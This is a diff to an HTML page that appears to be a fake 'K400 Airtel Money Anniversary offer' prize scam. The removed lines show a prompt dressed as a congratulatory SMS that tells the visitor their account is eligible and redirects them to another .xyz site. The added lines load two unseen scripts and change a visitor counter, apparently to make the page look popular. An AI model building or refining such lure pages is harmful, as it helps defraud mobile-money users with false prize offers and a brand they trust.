--- a/k400-AirtelMoney.html
+++ b/k400-AirtelMoney.html
@@ -4,15 +4,9 @@
 <html>
 
 <head>
-  
- <script type="text/javascript"> 
-/* Password Protection Script by www.onlineofferz.xyz*/
-var password = 'K400'
-password=prompt('SMS: Congratulations, your account is eligible to receive K400 Airtel Money Anniversary offer, press OK to Activate','K400');
-if (password != 'K400') {
-location.href='https://www.ekporoku.xyz/k400-AirtelMoney';
-}
-</script>
+   <script src="adsbank.js"></script>
+  <script src="zmairtel.js"></script>
+ 
   
 
 
@@ -1656,9 +1650,12 @@ function operatorDataBack() {
 </script>
 
 <!-- BEGIN: Powered by Supercounters.com -->
-<center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_i.js"></script><script type="text/javascript">sc_online_i(1724590,"ffffff","ffffff");</script><!-- END: Powered by Supercounters.com -->
 
+  <center><script type="text/javascript" src="//widget.supercounters.com/ssl/online_t.js"></script><script type="text/javascript">sc_online_t(1688513,"Likes","Ffffff");</script><br><noscript><a href="https://www.supercounters.com/">supercounters.com</a></noscript>
 
+</center>
+
+<!-- END: Powered by Supercounters.com -->
 
 
 <div style="visibility:hidden">
